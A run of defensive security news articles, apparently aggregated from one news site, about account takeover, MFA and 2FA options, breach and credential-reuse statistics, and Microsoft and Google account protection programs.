Multi-factor authentication (MFA) that depends on one of the authentication factors being delivered via SMS and voice calls should be avoided, Alex Weinert, Director of Identity Security at Microsoft, opined.
That’s not to say that MFA should be avoided, though, just that there are safer and more reliable ways to get additional authentication factors.
Why SMS- and voice-based MFA is the least secure option
Last year, Weinert noted that using any form of MFA is better than relying just on a password for security, as it “significantly increases the costs for attackers, which is why the rate of compromise of accounts using any type of MFA is less than 0.1% of the general population.”
But the delivery of authentication factors via publicly switched telephone networks (PSTN) is the least secure of the MFA methods available, he thinks, because:
- The SMS and voice formats aren’t adaptable to user experience expectations, technical advances, and attacker behavior in real-time
- PSTN systems are not 100% reliable, meaning the message or call may not come when needed
- Changing regulations may get in the way of SMS delivery and phone calls
- SMSes and phone calls were designed without encryption and can be intercepted (e.g., via software-defined radios, femotcells, SS7 intercept services, mobile malware, phishing tools)
- Support agents at companies operating publicly switched telephone networks can be tricked, bribed or coerced by attackers into providing access to the victims’ SMS or voice channel (e.g., via SIM swapping)
MFA is a must
The value of multi-factor authentication is not in question, but as more and more users adopt it, attackers will try come up with new ways to grab the needed OTP authentication codes.
Weinert advised users to, if possible, switch from SMS- and voice-based MFA to using app-based authentication. Naturally, he endorsed the Microsoft Authenticator app, but there are other apps that serve the same function (such as Google Authenticator, Cisco’s Duo Mobile) and the same protections (encrypted communication, more control, etc.).
There are other MFA options available, and some offer an even greater degree of safety against remote attacks, such as smart cards or security keys – actual physical devices attackers should get their hands on in order to gain access to secured accounts.
Attempted account takeover (ATO) attacks swelled 282 percent between Q2 2019 to Q2 2020, Sift reveals. Likewise, ATO rates for physical ecommerce businesses — those that sell physical goods online —jumped 378 percent since the start of the COVID-19 pandemic, indicating that fraudsters are leaning heavily on this attack vector in order to steal payment information and rewards points stored in online accounts on merchant websites.
According to Deloitte, ecommerce sales are forecasted to grow 25-35 percent and are expected to generate $182 billion and $196 billion this season.
When combined with the surge in ATO rates, the 2020 holiday shopping season presents the perfect opportunity for fraudsters to leverage account takeovers to take advantage of more people shopping online. This can have a devastating impact on companies including financial repercussions and brand abandonment.
Account hacking leads to brand abandonment
According to the research, ATO attacks also create significant and lasting brand damage. Based on a survey of 1,000 U.S. adult consumers, 28 percent of respondents would completely stop using a site or service if their accounts on that site were hacked.
And while consumers can secure their accounts by leveraging tools like password managers, multi-factor authentication (MFA), and by using unique passwords, they largely ignore these best practices. In fact, 66 percent of consumers surveyed either don’t use any type of password manager or aren’t sure if they do, despite 52 percent of them having concerns about becoming victims of ATO in the future, and 25 percent reporting that they have already had their accounts hacked at least once before.
- Attacks are fueled by automation: Between Q2 2019 and Q2 2020, ATO attacks happened in discrete waves about a week apart, indicating that fraudsters are turning to bots and automation in order to overwhelm trust & safety teams.
- Fraudsters sneak in and cash out: Of those who have experienced ATO, 41 percent of respondents reported that payment details were stolen and used to make purchases, and 37 percent of victims had money taken directly from their accounts. Another 37 percent had rewards points or credits taken and used to buy goods and services.
- Ecommerce is in the crosshairs: Of consumers who confirmed being victims of ATO attacks, a whopping 61 percent said their ecommerce (both physical and digital goods and services) accounts were hacked.
- Other online destinations on which consumers reported experiencing ATO include:
- Social media sites: 36 percent
- Financial services sites: 35 percent
- Online dating sites: 22 percent
- Travel sites: 19 percent
ATO attacks for financial gain
Like payment fraud and content abuse—two of the other links in the fraud supply chain – account takeover is typically a means to a financial end.
Using credentials either illicitly purchased on the dark web or obtained through techniques like credential stuffing, hackers gain access to user accounts on a business’s website and then make purchases on that website using stored payment information or rewards points. Attackers may also export the stored information in order to commit fraud across the web.
While consumers may be the immediate victim of these attacks, businesses ultimately face the real costs: in addition to reimbursing hacked customers, businesses face exorbitant chargeback fees and payment network fines when ATO leads to payment fraud.
Customer security as customer experience
“The surge in ATO attacks indicates that merchants can’t leave the burden of account security to their customers. Rather, companies should treat account protection as part of the overall customer experience and as a key part of their Digital Trust & Safety strategy, which allows for seamless transactions while preventing fraud.”
Video conferencing platform Zoom is finally offering all users the option to enable two-factor authentication (2FA) to secure their accounts against credential stuffing attacks and attacks leveraging phished login credentials.
How to enable Zoom 2FA on a Pro, Business, Education, or Enterprise account
Zoom gives the choice between two modes of delivery of the second authentication factor (a 6-digit code):
- Via a 2FA app that supports Time-based One-Time Password (TOTP) protocol – e.g., Google Authentication, Microsoft Authenticator, or FreeOTP
- Via SMS (text message)
Account owners/admins can enable the option at the account-level by:
1. Singing in to the Zoom Dashboard.
2. In the navigation menu, clicking Advanced, then Security.
3. Enabling the Sign in with Two-Factor Authentication option.
4. Specifying users to enable 2FA for:
- All users in the account
- Users with specific roles
- Users belonging to specific groups
5. Clicking Save.
Once that’s done, they can inform the users about the option and provide instructions on how to take advantage of it.
As it’s usual with these things, once users set up the option, they are also provided with backup codes to use in case they misplace their phone, uninstall their 2FA app or remove Zoom from the 2FA app by mistake. If they lose those, there’s always the option to ask their admin to reset their 2FA setup.
How to enable Zoom 2FA on a (free) Basic account
Users who have opted for a Basic account can set up 2FA by:
- Signing in to their account via the Zoom web portal
- In the navigation menu, clicking Profile, then enabling Two-Factor Authentication by clicking Turn on
- Entering their password into the pop-up box
- Opting for one of the options and setting it up:
Once they’ve set up 2FA, they can make changes at the same “place” (the Profile tab):
Zoom and security
Since its popularity and user base skyrocketed in the wake of the Covid-19 pandemic, Zoom has been working on fixing many security and privacy issues.
More recently, Zoom Video Communications announced that it is working on providing end-to-end encryption (E2EE) to both paying Zoom customers and those with free (Basic) accounts.
Applications are a gateway to valuable data, so it’s no wonder they are one of attackers’ preferred targets.
And since modern applications aren’t a monolithic whole but consist of many separate components “glued together” over networks, attackers have at their disposal many “doors” through which they can attempt access to the data.
Easy targets will remain popular
Some of these doors are more popular than others. According to the latest Application Protection Report by F5 Networks, attackers love to:
“PHP is a widespread and powerful server-side language that’s been used in 80% of sites on the web since 2013. It underpins several of the largest web applications in the world, including WordPress and Facebook,” F5 analysts explained the attraction.
2. Engage in injection attacks and formjacking (the latter especially when targeting the retail sector).
In 2019, formjacking payment cards was resposible for 87% of web breaches and 17% of known breaches in total (up from 71% and 12% in 2018). In 2019, the retail sector was the most significant formjacking target. 81% percent of retail breaches were from formjacking attacks, while nearly all other sectors tended to be breached most often through the access tier.
“The lesson is clear: for any organization that accepts payment card via the web, their shopping cart is a target for cyber-criminals,” the analysts pointed out.
3. Getting access to accounts (and especially email accounts) via phishing, brute forcing, credential stuffing or using stolen credentials.
“Access tier attacks are any that seek to circumvent the legitimate processes of authentication and authorization that we use to control who gets to use an application, and how they can use it. The result of this kind of attack is a malicious actor gaining entry to a system while impersonating a legitimate user. They then use the legitimate user’s authorization to accomplish a malicious goal— usually data exfiltration,” the analysts explained.
Attackers use a number of tactics to keep these attacks unnoticed, but organizations also have a lot of defensive options at their disposal to prevent them.
4. Go after unmonitored, vulnerable, poorly secured or misconfigured APIs.
“In the days of monolithic apps, whatever core business logic generated value needed to be supported by a user interface, storage, and other meta-functions. Now it is sufficient to develop a single specialized service, and use APIs to either outsource other functions to bring an app to market, offer the service to other app owners, or both,” the analysts explained.
Their widespread used makes them a big target, and a combination of factors make them rich targets:
- They are often configured with overly broad permissions
- Lack of visibility and monitoring.
There are solutions to these problems
Attackers go where the data is, and that’s why organizations in each sector/industry should develop risk-based security programs and tailor controls and architecture to reflect the threats they actually face, the analysts advise.
To counter access attacks, organizations should implement multi-factor authentication where fitting and possible, but should also consider:
- Checking passwords against a dictionary of default, stolen, and well-known passwords
- Making sure the system can detect and prevent brute force attacks by, for example, using CAPTHA, slowing down sessions, setting up alarms, etc.
- Creating simple methods for users to report suspected phishing
- Encrypting or eliminating confidential data from the organization’s email caches
- Enabling logging (to be able to discover what the attackers did when they gained access).
Spotting and foiling injection and formjacking attacks can be done with securing servers, patching injection vulnerabilities,employing change control, using web application firewalls (WAFs), through testing and watching of all third-party components on sites with forms accepting critical information, and so on.
But organizations should be aware that the injection landscape is constantly changing, and they have to follow the trends and adapt.
Finally, organizations can mitigate the risk of API attacks by:
- Making (and maintaining) an inventory of their APIs
- Deploying authentication for them and storing credentials securely
- Limiting their permissions
- Monitoring them (by logging connections and reviewing them)
- Encrypting the API connections
- Testing APIs
- Implementing API security tools.
Since the COVID-19 outbreak, digital fraud has increased significantly, especially when it comes to account takeover. In this Help Net Security podcast, Angie White, Senior Product Marketing Manager at TransUnion, explores ATO and social engineering attacks and offers some suggestions on how to address these threats.
Here’s a transcript of the podcast for your convenience.
Hello. This is Angie White, Senior Product Marketing Manager for TransUnion Global Fraud and Identity Solutions. Today we’re going to dive into how COVID-19 is driving an increase in account takeover as well as providing some suggestions on how to combat.
Before we get too into the weeds, let’s just quickly level set on a definition of account takeover or ATO. Account takeover is when a legitimate customer’s account is accessed through illicit means for the purpose of committing fraud. Account takeover isn’t a new phenomenon. It’s something that’s been around in financial services and banking for a long time, but we’ve seen a rapid increase in segments such as e-commerce, insurance, telecommunications in recent years.
How is COVID-19 driving an increase in account takeover? We’re seeing two primary factors. First off is just the increase in volume, as consumers have been forced to turn to digital channels because they can no longer go to their local bank, go to their local store. It’s really made it easier for fraudsters to hide in that uptick of volume. Secondly, you see that fraudsters are taking advantage of the chaos using the uncertainty to victimize consumers.
Looking at our data, we’re seeing big spikes for sectors such as banking, telecommunications, e-commerce. As an example, we saw a 23% increase in e-commerce traffic the week of March 11th to 18th, so that was the week following the declaration by the World Health Organization of the pandemic. This left many businesses trying to shore up work from home operations, secure their sites and deal with increases in volume both on their sites but also in their contact centers.
The Aite group estimates that banks have seen spikes in call center volume at around 40%, so that’s quite the increase. Likewise, telecommunications providers have seen spikes ranging around 25%. Never missing an opportunity, fraudsters have also taken advantage of a chaos to perpetrate more fraud, and in an analysis of transactions we protect, we found a 14% increase in risky transactions for financial services since March 11th. So, we’re definitely seeing that already play out for our customers.
Also, looking at the consumer impact, TransUnion pulled over 3000 Americans, 18 and older, on how COVID-19 is impacting them. 28% of respondents indicated that they had already been targeted by a digital fraud scam related to COVID-19, and this was up from the previous week where 23% had indicated that they had already been targeted. So, a 5% increase in one week. This really highlights that this trend is likely to accelerate. Of those consumers, 10% of Gen-Z and 9% of Millennials indicated that they had already fallen victim to a COVID-19 scam. So, we’re seeing approximately a third of those scams be successful.
There are a number of attack methods used to perpetrate account takeover, but for our purposes I’m only going to hit on three of the most common methods: phishing scams, social engineering and credential stuffing.
Phishing scams. You’ve likely all seen these emails, they look very legitimate or it could be a phone call or legitimate looking website. Fraudsters are using the current crisis to send out prevention tips for COVID-19, news updates, promising information about stimulus checks, using that to steal login credentials and personal data through various means. Unfortunately, consumers have a bad habit of reusing login credentials. That means that such compromises will likely lead to an uptick in account takeover across all industries and across the board.
Social engineering can come in a number of flavors. One attack method is to gather information that is publicly available about a consumer, from sources such as social media or that have been gained from phishing attacks. In the age of social media, consumers have gotten in the habit of oversharing, so publicly posting about things like attending a high school reunion, that makes it very easy for a fraudster to then go and search on that high school, find out who their mascot is, find out what their hometown is. Those are all pieces of information that can be used in social engineering to answer KBA questions, to socially engineer contact center agents and gain access to an account.
Another flavor of social engineering that we see is what we term romance scams. This is where a bad actor ingratiates themselves with an intended victim. We actually had a real use case with one of our customers, a very large telcom provider, where fraudsters were going out ingratiating themselves with lonely people on dating sites and getting them to give them their login credentials with the promise that they would go and add a phone line, get a phone so that they could talk more.
Of course, the fraudsters go in, they add 10 lines, order 10 new phones and create big losses for the business and a lot of dissatisfaction for that customer. I’ll talk through some ways that they shut that down in just a moment.
Lastly, credential stuffing. This is when fraudsters, they take stolen credentials, gained through phishing attacks or in many cases simply bought off the dark web, and they test those stolen credentials against a site to see what accounts they can gain access to. These attacks are often automated using bots. When they find a good account, they go in, they can take it over. And what’s more is they use those good credentials, not only on that site, they move from site to site, seeing if they’ll work on other platforms.
So again, with the attacks that we’re seeing due to COVID-19, with the increase in phishing scams, increased breached credentials, personal data, that’s all going to drive more credential stuffing attacks.
There’s a number of measures that businesses can take to mitigate account takeover. I’m going to break it out by customer touch points. So let’s start at login.
You really do need to go beyond username and password to secure customer accounts. With all the breaches, all the phishing attacks, you really do need to move forward with the assumption that your consumer’s credentials have been compromised. There’s a number of options that are easy to layer onto existing authentication solutions depending on the need of your business. Things such as one-time passcodes, or OTP, multifactor authentication, captcha. At TransUnion, we recommend device-based authentication. This essentially pairs the consumer device to their account using it as a mode of authentication.
I touched on the romance scams a little earlier. This is exactly how that telcom provider shut down account takeover in their service, so they implemented device-based authentication. They were able to pair good user devices to their accounts, that way, if a fraudster came in, even with the correct credentials, they could see that that device was not authorized to access that account, so very effective for them in shutting down account takeover.
Device-based authentication also gives you a lot of risk insight that isn’t available for most other authentication methods. Things like unusual velocities, geolocation mismatches, or the use of anonymizing proxy, so somebody’s trying to make it look like they’re coming from a mobile device when you can really see that they’re using an emulator and coming from a laptop.
The next point of risk is account management. Once fraudsters have gained access to an account, they of course want to change account details such as email or shipping address so they can take over the account.
Again, there’s a number of methods where you can protect account management. You can add verification checks such as verifying email, phone, address. Another very effective method is using push authentication. With this, you can push an authentication request to the user’s device to authenticate with, say, a thumbprint or a PIN that they did initiated that change to their account.
One of the benefits of this is that you can use it for any channel. So, if somebody is requesting changes via the web, via your application, or even via the contact center, you can push that authentication request directly to the user’s device to authenticate before proceeding with the change.
As your business starts to operate in the new normal that is COVID-19, it’s really important to think through what are your points of risk across your customer journey and how can you add protection without adding too much friction. Unfortunately, there isn’t a silver bullet for shutting down ATO because there are many points of risk across the customer journey and many different attack methods.
Businesses are really going to have to examine what are their points of risk in the customer journey, how can they protect those points of risk without adding too much friction and create the new normal in the COVID-19 era. Stay safe out there.
While most consumers are taking necessary security precautions to protect their online accounts, businesses may not be doing enough to protect their information – inadvertently driving sales to competitors that can, an Arcserve research reveals.
A survey of nearly 2,000 consumers across North America, the United Kingdom, France, and Germany, found that 70% believe businesses aren’t doing enough to adequately secure their personal information and assume it has been compromised without them knowing it. And, as consumers become more educated and cyberattacks become well-known, perceived trust becomes more influential in their purchasing decisions, with the study also finding that:
- Nearly nine of ten consumers consider the trustworthiness of a business prior to purchasing a product or service and,
- 59% of consumers would likely avoid doing business with an organization that had experienced a cyberattack in the past year.
These findings suggest businesses must manage uncharted challenges with the rise of cybercriminals now making breaches public, regardless of ransoms paid.
Ransomware-related service disruption: Consumer tolerance threshold
Cyberattacks have arguably become the largest business threat, however the quantifiable impact on consumer behavior has not been widely understood. The study found that one in four consumers will abandon a product or service in favor of a competitor after a single ransomware-related service disruption, failed transaction, or instance of inaccessible information.
It also found that tolerance for these events quickly deteriorates, with:
- Over 66% of respondents citing they would turn to a competitor if an organization couldn’t restore systems and applications within three days following a cyberattack and,
- Over a third of those would be willing to switch after a mere 24 hours of waiting to access their information or make a transaction.
Moreover, the potential damage doesn’t stop during or shortly thereafter a cyberattack event. More than eight in ten respondents admit to sharing their negative, ransomware-related experiences with family, friends or colleagues, posting about their experiences online, or emailing about the incidents.
Certain industries fare better than others
While the report concludes that consumers are generally intolerant of cyberattacks, there are a few industries where businesses are under even more pressure to keep data secure and operations running. The survey found that:
- Nearly half of consumers would walk away from their banking or securities provider immediately upon experiencing a ransomware-related event which prohibited them from transacting or accessing information and,
- 43% would immediately seek out a competitive communications product or service.
While there are many negative ramifications caused by cyberattacks, businesses that take proactive steps and mitigate ransomware quickly will benefit in the long run.
Over half of respondents would be willing to pay more for products and services they believe to be more reliable and secure in the banking and securities industries, and over 40% would pay more if they believed products and services were more secure from companies in the healthcare, insurance, and retail categories.
“Consumers are clearly already hesitant about working with companies hit by cyberattacks, and they just won’t tolerate disruption as businesses figure out recovery and remediation plans after-the-fact,” said Arcserve CTO Oussama El-Hilali.
“The findings represent a stark warning for all organizations given that one in four of their customers will be gone immediately upon disruption, with many more losing patience within 48 hours.
“Businesses must do more to ensure they’re protecting their data from cybercriminals and mitigating the chance they’ll experience extended downtime. We recommend a two-pronged approach where cybersecurity, backup and disaster recovery are deeply entwined.”
After recently directly notifying a number of hospitals about vulnerable gateway and VPN appliances in their infrastructure, Microsoft has decided to offer its AccountGuard threat notification service for free for healthcare and worldwide human rights and humanitarian organizations.
“AccountGuard is available to organizations using Office 365 for business email and extends additional security to the personal accounts of their front line workers who use Microsoft’s consumer email services such as Outlook.com and Hotmail,” Tom Burt, Microsoft’s Corporate VP on Customer Security & Trust, explained.
“Both AccountGuard for Healthcare and AccountGuard for Human Rights Organizations will initially be available to organizations in the 29 countries where we already offer AccountGuard, subject to review of local laws and regulations, and we will be adding new countries based on need and local law.”
Microsoft AccountGuard and the new offer for healthcare
Launched in 2018 and previously available to only to political campaigns, parties, members of the U.S. Congress and democracy-focused non-profits, the Account Guard service warns the owners of enrolled accounts about ongoing attacks by nation-state hackers.
“Healthcare organizations can sign up here, and human rights and humanitarian organizations can sign up here,” Burt noted. AccountGuard for Healthcare will be available until the COVID-19 pandemic subsides.
The threat notification service is now available for free to: hospitals and care facilities, clinics, labs, and clinicians that provide frontline care to patients; pharmaceutical, life sciences, and medical devices companies that research, develop, and manufacture COVID-related treatments drugs; non-governmental organizations (NGOs), and international non-governmental organizations (INGOs) involved in the response to the COVID-19 pandemic; select individuals (with Outlook.com and Hotmail.com personal emails) invited to participate by an eligible organization.
Participation in AccountGuard for Human Rights Organizations is offered by invitation only.
“Leading human rights and humanitarian organizations including Amnesty International, CyberPeace Institute, Freedom House, Human Rights Watch and Physicians for Human Rights have already registered for our AccountGuard threat notification service through an initial pilot,” Burt added.
Most attacks start with phishing emails
“An attacker will often disguise malicious content as a message from a health authority or medical equipment provider. These emails sent to work or home inboxes seek to obtain the person’s credentials and often contain documents or links that will infect a computer and spread the infection through a network, enabling attackers to control it,” he explained.
Attackers targeting healthcare organizations are after COVID-19-related intelligence and/or are looking to disrupt the provision of desperately needed care or supplies. Those probing human rights or humanitarian organizations are after intelligence on these organizations and the people who these groups protect, or want to disrupt their work.
Since the start of the year, journalists and news outlets have become preferred targets of government-backed cyber attackers, Google’s Threat Analysis Group (TAG) has noticed.
“For example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation. In other cases, attackers will send several benign emails to build a rapport with a journalist or foreign policy expert before sending a malicious attachment in a follow up email,” shared Toni Gidwani, a security engineering manager at TAG.
Government-backed attackers also target foreign policy experts – for their research, access to the organizations they work with, and connection to fellow researchers or policymakers for subsequent attacks – as well as government officials, dissidents and activists.
Protecting Google accounts
Aside from trying to deliver malware to compromise the targets’ computer and/or smartphone, the attackers are also trying to compromise their online accounts – repeatedly.
“In 2019, one in five accounts that received a [government-backed phishing or malware attack] warning was targeted multiple times by attackers. If at first the attacker does not succeed, they’ll try again using a different lure, different account, or trying to compromise an associate of their target,” Gidwani said, and boasted about the effectiveness of Google’s protections when it comes to phishing and account hijacking.
“We’ve yet to see people successfully phished if they participate in Google’s Advanced Protection Program (APP), even if they are repeatedly targeted,” she claimed.
Google’s APP provides additional account security for those who are at an elevated risk of targeted attacks, by: requesting the person logging in to have a specific physical security key (as well as the password and the second authentication factor), preventing untrusted third-party apps to access the account, providing added download protection, insisting on a stricter account recovery process, etc.
The attackers haven’t failed to notice the effectiveness of the protections, Gidwani says, and have slowed down their onslaught. “In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018,” she noted.
Google’s TAG also discovers attacks and tracks attackers exploiting zero-day vulnerabilities in popular software – in 2019, they discovered zero-day vulnerabilities affecting Android, Chrome, iOS, Internet Explorer and Windows.
“Last year, TAG discovered that a single threat actor was capitalizing on five zero-day vulnerabilities,” she shared.
“Finding this many zero-day exploits from the same actor in a relatively short time frame is rare. The exploits were delivered via compromised legitimate websites (e.g. watering hole attacks), links to malicious websites, and email attachments in limited spear phishing campaigns. The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.”
Have you secured your streaming services’ accounts? Are you sure someone else, unbeknown to you, isn’t using them as well?
As people around the world are being asked to remain in their homes due to the coronavirus pandemic, many are turning to streaming services such as Netflix, Hulu, Disney+, Spotify, and Apple Music for entertainment, Proofpoint cybersecurity strategist Adenike Cosgrove notes.
He also posits that, despite cybercriminals having been compromising users’ streaming services’ accounts for ages, they will now likely increase their efforts.
How do criminals usually steal streaming credentials
Streaming credentials are usually stolen via malware (information-stealing Trojans) or fake login/phishing pages:
Criminals are also trying out credentials leaked after data breaches. If the user has reused them for their streaming accounts, their compromise is, effectively, just a matter of time.
Finally, they sell the compromised login credentials for a fraction of the price of a legitimate subscription:
“At this point there is a very mature, operationalized market for stolen streaming credentials,” Proofpoint researchers noted. “When attackers get your streaming credentials, they sell them to others who will use them to log on and piggyback off of your streaming services, likely without you even knowing it.”
What can you do to protect your online streaming accounts?
None of the aforementioned streaming services have made available the two-factor authentication option for their customers, so the security of those accounts still depends on users:
- Choosing a strong, long and unique password that they will not reuse for other accounts
- Being able to spot and avoid phishing pages
- Being able to avoid getting infected with info-stealing malware.
The researchers advised users to keep their operating system, browsers and plug-ins up to date and not click on links embedded in emails or attachments to visit a streaming site.
“It is also important to always use a unique strong password for each of your streaming sites, ideally in conjunction with a password manager,” they added.
“Additionally, many streaming services now provide an option that notifies you anytime a new device connects to your account. Selecting this option will allow you to verify that each device is authorized and take action if it is not.”
Users who by reviewing recent streaming activity associated with the account spot an unknown device logged into it, should first change the account password then sign out all devices and, finally, sign in again with the new password. This will lock any unauthorized user from the account.
It’s good to add that if your account has been compromised, so has the information it holds, including payment card information. Users would do well to cancel that card and be on the lookout for fraud and identity theft attempts leveraging the compromised information.
9,050,064,764 credentials have been recovered throughout 2019 which came from a total of 640 unique data breaches and include email addresses connected to plaintext passwords and usernames with plaintext passwords, SpyCloud reveals.
That means, on average, each of these data breaches gave criminals more than 14 million sets of login credentials. Because people often reuse passwords across several accounts, both personal and for work, each set of login credentials could be used to access dozens or more accounts through which cybercriminals can perpetrate fraud.
Credential exposure report
Almost a third of internet users affected by data breaches last year had reused a password in some form. 94% of those who recycled passwords reused the exact same password, while the other 6% made minor changes such as capitalizing the first letter or adding numbers to the end of their typical password. These tactics are easily defeated by tools, which test for common, slight variations.
In terms of organizational security, there’s a worrying trend more of the data criminals are sharing and selling came from breaches of misconfigured or unsecured servers. Organizations may also be taking incomplete steps to protect passwords.
Criminals still using passwords they stole in 2012
The researchers found that more than half (53.7%) of the plaintext passwords recovered were originally protected using the outdated hashing algorithms SHA-1 and MD5.
Security professionals have recommended against using SHA-1 since about 2005, and against using MD5 since as far back as 1996, because cybercriminals can easily and quickly crack passwords hashed with these functions and recover plaintext passwords.
“Our data shows that consumers are still not changing their poor password habits, yet we know they’re holding organizations accountable for their security.” said David Endler, chief product officer for SpyCloud.
“Criminals are still using passwords they stole in 2012 to attack and take over accounts today. Companies need to guide users to set better passwords at the time of account creation and they need to help users maintain strong, uncompromised passwords whenever their credentials are exposed in a breach anywhere in the world.”
World’s most popular passwords protecting some 125 million accounts
Despite the problem of password fatigue and reuse coming into clearer focus over the past few years, little has changed in the world’s most popular passwords. Among the more than nine billion collected last year, the top three are “123456,” “123456789,” and “qwerty,” and are being used to protect some 125 million accounts.
It is increasingly up to organizations to comply with NIST’s password guidelines, which recommend checking user passwords for those that have exposed bee in previous breach corpuses, as well as commonly used or easy-to-guess passwords.
Google users who opt for the Advanced Protection Program (APP) to secure their accounts are now able to use their iPhone as a security key.
About Google’s Advanced Protection Program
Google introduced the Advanced Protection Program in late 2017, to help high-risk users – journalists, human rights activists, IT admins, executives, etc. keep their Google accounts safe from targeted attacks.
APP is available to both consumer (Google Account) and enterprise users (G Suite).
It initially allowed users to make their accounts more secure by requiring them to have and use a physical security key to provide additional user verification during the login process.
In May 2019, Google made it possible to exchange the physical security key with one’s Android device. Now, finally, iPhone and iPad users can take advantage of that option, too.
Using iPhones for APP
Google considers security keys to be the strongest protection against account takeover attacks, whether they are performed by an automated bot, are bulk phishing attacks or extremely targeted (and tailored) attacks.
Making security more convenient is key to improving the adoption of security practices. By offering Android and iPhone/iPad users the option to use their devices as a security key, Google is making it easier for users to enroll into APP.
Let’s face it: we take our mobile phones with us everywhere and most of use are very conscientious about keeping the battery charged. Physical security keys, on the other hand:
- Are pricy for some
- May not be available for purchase to all who need them, and
- Are a piece of hardware that some might not want to have to keep track of and lug around all the time.
To be able to use one’s iPhone for APP, users have to have an iPhone running iOS 10+, the latest version of Google’s Smart Lock installed on it, and Bluetooth enabled.
The device through which they are signing into their account has to have the latest version of a compatible browser (e.g., Chrome), the latest version of a compatible OS (e.g., Chrome OS, Mac OS, or Windows 10), and Bluetooth enabled.
Google has provided this helpful guide on how to set up one’s phone’s built-in security key and use it.
Google has introduced new security options for G Suite customers, including Advanced Protection for enterprise users and access control for apps accessing G Suite data. Advanced Protection for high-risk users The Advanced Protection option was in beta since August 2019, and is now generally available to all G Suite editions and on by default. It allows admins to enforce a specific set of high-security policies for employees in their organization that are most at risk … More